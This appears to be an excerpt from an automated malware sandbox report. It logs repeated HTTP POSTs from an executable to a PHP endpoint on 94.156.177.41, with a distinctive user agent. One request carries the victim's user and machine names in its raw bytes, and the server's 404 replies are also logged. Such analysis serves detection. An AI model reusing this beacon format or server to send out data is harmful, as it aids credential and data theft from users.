Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00404ED4 recv,

3_2_00404ED4

Source: unknown

HTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
